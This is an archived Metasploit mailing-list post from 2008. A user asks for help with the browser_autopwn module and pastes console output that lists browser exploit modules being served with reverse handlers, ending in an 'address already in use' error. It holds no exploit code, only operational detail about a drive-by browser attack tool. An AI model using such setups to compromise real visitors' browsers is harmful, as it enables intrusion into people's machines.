Metasploit mailing list archives

server/browser_autopwn module explaination


From: m.iodice at gmail.com (Mirko Iodice)
Date: Sun, 10 Aug 2008 23:49:38 +0200

I noticed only a couple of days ago the existence of browser_autopwn
aux module, It reminds me things like Mpack or Icepack.
I was wondering if it's possible to have more info on how to use it.
Everytime I tried, no matter which port has been set as SRVPORT
option, the module fail with the following error: "The address is
already in use"

msf auxiliary(browser_autopwn) > exploit
[*] Starting exploit modules on host 192.168.0.5...
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:9090/exploit/multi/browser/mozilla_compareto
[*]  Local IP: http://192.168.0.5:9090/exploit/multi/browser/mozilla_compareto
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:9090/exploit/multi/browser/mozilla_navigatorjava
[*]  Local IP: http://192.168.0.5:9090/exploit/multi/browser/mozilla_navigatorjava
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:9090/exploit/multi/browser/firefox_queryinterface
[*]  Local IP: http://192.168.0.5:9090/exploit/multi/browser/firefox_queryinterface
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:9090/exploit/windows/browser/apple_quicktime_rtsp
[*]  Local IP: http://192.168.0.5:9090/exploit/windows/browser/apple_quicktime_rtsp
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:9090/exploit/windows/browser/novelliprint_getdriversettings
[*]  Local IP: http://192.168.0.5:9090/exploit/windows/browser/novelliprint_getdriversettings
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:9090/exploit/windows/browser/ms03_020_ie_objecttype
[*]  Local IP: http://192.168.0.5:9090/exploit/windows/browser/ms03_020_ie_objecttype
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:9090/exploit/windows/browser/ie_createobject
[*]  Local IP: http://192.168.0.5:9090/exploit/windows/browser/ie_createobject
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:9090/exploit/windows/browser/ms06_067_keyframe
[*]  Local IP: http://192.168.0.5:9090/exploit/windows/browser/ms06_067_keyframe
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:9090/exploit/windows/browser/ms06_071_xml_core
[*]  Local IP: http://192.168.0.5:9090/exploit/windows/browser/ms06_071_xml_core
[*] Server started.
[*] Started reverse handler
[*] Server started.
[*] Started reverse handler
[*] Server started.
[-] Auxiliary failed: The address is already in use (192.168.0.5:9090).
[*] Auxiliary module running as background job

After getting this error I tried to launch the "exploit" command again
and, even if the console logs a bounch of "address already in use"
errors, it seems to start succesfully. Making the victim to connect to
the given URI will always show the following message in the
msfconsole: "I don't know how to handle that request #{request.uri},
sending 404"

I'm confused.
Thank you.



Current thread: